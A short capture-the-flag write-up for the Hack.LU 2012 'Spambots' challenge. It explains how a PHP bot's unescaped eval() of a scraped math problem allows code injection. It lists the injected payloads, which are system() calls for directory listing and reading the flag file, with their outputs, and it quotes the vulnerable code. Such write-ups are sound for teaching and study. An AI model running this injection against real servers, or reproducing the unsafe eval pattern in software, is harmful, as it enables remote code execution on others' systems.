Posted on by and filed under Hack.LU 2012.

The trick here was to spot the vulnerability. The scripts loads html from a controlled webpage with @file_get_contents(). It then parses the html for forms with regex to solves a basic math problem, with unescaped eval(). Finally the page submits a post request to the controlled webpage with file_get_contents().

With that information determined from the observed process, we can submit a link to a page with an invalid spam field to cause code execution. Since we did not know where the key was on the system, we had to execute a few recon commands to find it. All it takes it to host a form with some data.

This was the sample order:

1+1;
system(“pwd”, $var);
echo($var);
output: /var/www/spambot/

1+1;
system(“ls”, $var);
echo($var);
output: index.php

1+1;
system(“ls /var/www/”, $var);
echo($var);
output: spambot directory, guestbook directory

1+1;
system(“ls /”, $var);
echo($var);
output: normal linux files and: 6f170bcecda1ca8d3a5435591202988881b34bad

1+1;
system(“cat /6f170bcecda1ca8d3a5435591202988881b34bad”, $var);
echo($var);
output: the flag is OMG_EVAL_IS_EVIL_SPAM

The following code was taken from the index after:
preg_match("(.*[0-9].*[-+*].*)/Ui", $data, $secret);
$protection = $secret[1];
echo "[*] found spam protection: ".$protection."n";
eval("$solution = $protection;");

if(!is_numeric($solution)) {
die("[-] solution not numericn");
}

echo "[+] solved (".$spamField."): ".$solution."n";

eval() literally runs php code. Since we have complete control over the $protection variable, we can simply run shell commands on the server to print out the key.

Spambots

Credit: Alex Lynch